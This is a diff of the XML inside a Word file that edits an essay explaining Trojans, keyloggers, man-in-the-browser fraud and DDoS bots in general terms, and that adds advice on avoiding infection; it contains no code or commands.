+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>files with a .exe extension</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> for Windows and .dmg for macOS</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">) which means they could exist in the victim’s filesystem. But, will not be of any harm unless the executable is executed. According to [1], it is important to note that a virus would neither spread nor infect one’s machine without user intervention (such as running the infected program). [1] explains that as a virus is spread by human action, people will continue to unintentionally spread them by sharing infecting files or sending e-mails in where the viruses can come along as attachments.  </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -326,7 +374,334 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">is known to be as impish as it methodological namesake. The Trojan would seem to be a somewhat useful piece of software at first glance but will do damage to one’s machine once installed or executed. On the other hand, those on the receiving end of a trojan horse would tend to open them since they appear as legitimate software from a verified source. The activation of a Trojan can yield various results ranging from annoying to malicious to damaging. Trojans are also known to install a backdoor on your system which grants the developer of the said Trojan access to your system and possibly compromise confidential or personal information. Unlike viruses and worms, according to [1], Trojans neither reproduce by infecting other files in the filesystem nor do they self-replicate. In conjunction with this, in a research conducted by [4] the Trojan Horse was defined as a novel network attack program that is a remote control-based software that has the potential to control another machine based on a program. They explain that depending on the virus’s implementation, a trojan can enter into a user’s computer to steal personal information, tamper with data, destroy files, format entire drives or cause the infection of other kinds of viruses. </w:t>
+        <w:t xml:space="preserve">is known to be as impish as it methodological namesake. The Trojan would seem to be a somewhat useful piece of software at first glance but will do damage to one’s machine once installed or executed. On the other hand, those on the receiving end of a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>T</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">rojan </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>H</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">orse would tend to open them since they appear as legitimate software from a verified source. The activation of a Trojan can yield various results ranging from annoying to malicious to damaging. Trojans are also known to install a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>backdoor</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> on your system which grants the developer of the said Trojan access to your system and possibly compromise confidential or personal information. Unlike viruses and worms, according to [1], Trojans neither reproduce by infecting other files in the filesystem nor do they self-replicate. In conjunction with this, in a research conducted by [4] the Trojan Horse was defined as a novel network attack program that is a remote control-based software that has the potential to control another machine based on a program. They explain that depending on the virus’s implementation, a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>T</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">rojan can enter into a user’s computer to steal personal information, tamper with data, destroy files, format entire drives or cause the infection of other kinds of viruses. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="720"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">Additionally, Trojans can also harm a user in other ways. According to [2] some </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>T</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">rojans take advantage of </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>security flaws</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> present in older versions of internet browsers such as Internet Explorer and Google Chrome to effectively hide internet usage enabling the controller to use the internet for illegal purposes while all potentially incriminating evidences are associated with the infected machine or with its I.P. address. Furthermore, they can also </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>steal one’s identity</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> by coming in the form of a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>keylogger</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> which can keep a record of whatever key the victim strikes on their keyboard</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> possibly leading to the compromise of their personal accounts which the controller could then use to impersonate the victim and damage </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>their</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> reputation. Two more ways a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>T</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">rojan can harm someone as stated by [3] are the following: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>first,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the controller </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">can manipulate your requests </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">as Trojans are typically used in </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>man in the browser</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> attacks. This type of attack, according to [3] is commonly employed in the banking sector where a lot of transactions occur. Here, the Trojan will manipulate the total requested amount and its destination account after the user confirms the transaction. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Second,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the victim can possibly get involved in a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>DDOS</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (Distributed Denial-of-Service)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> attack</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> where the victim’s machine will be used as a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>DDOS minion</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> that would relay connection requests to the target.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -339,156 +714,313 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="720"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">Additionally, Trojans can also harm a user in other ways. According to [2] some trojans take advantage of </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i/>
-          <w:iCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>security flaws</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> present in older versions of internet browsers such as Internet Explorer and Google Chrome to effectively hide internet usage enabling the controller to use the internet for illegal purposes while all potentially incriminating evidences are associated with the infected machine or with its I.P. address. Furthermore, they can also </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i/>
-          <w:iCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>steal one’s identity</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> by coming in the form of a </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i/>
-          <w:iCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>keylogger</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> which can keep a record of whatever key the victim strikes on their keyboard possibly leading to the compromise of their personal accounts which the controller could then use to impersonate the victim and damage his reputation. Two more ways a trojan can harm someone as stated by [3] are the following: one is the controller </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i/>
-          <w:iCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">can manipulate your requests </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">as Trojans are typically used in </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i/>
-          <w:iCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>man in the browser</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> attacks. This type of attack, according to [3] is commonly employed in the banking sector where a lot of transactions occur. Here, the Trojan will manipulate the total requested amount and its destination account after the user confirms the transaction. Another is the victim can possibly get involved in a </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i/>
-          <w:iCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>DDOS attack</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> where the victim’s machine will be used as a </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i/>
-          <w:iCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>DDOS minion</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> that would relay connection requests to the target.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="720"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">In modern times, there are several ways that can employed to avoid being infected with a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>T</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">rojan </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>H</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">orse. The first would be </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">never download or </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>launch</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> programs from an untrusted or unverified source.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> The fact that modern revisions of the operating systems </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">(OSs) </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>that run most of the hardware to date are updated to protect themselves against various kinds of infections</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> before a user can even launch the Trojan Horse</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>one</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> can never be</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> entirely</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> safe. Therefore, one should not be eager to install applications from an unknown source. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>They</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> should ins</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>p</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ect them with </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">an </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>anti</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>malware</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
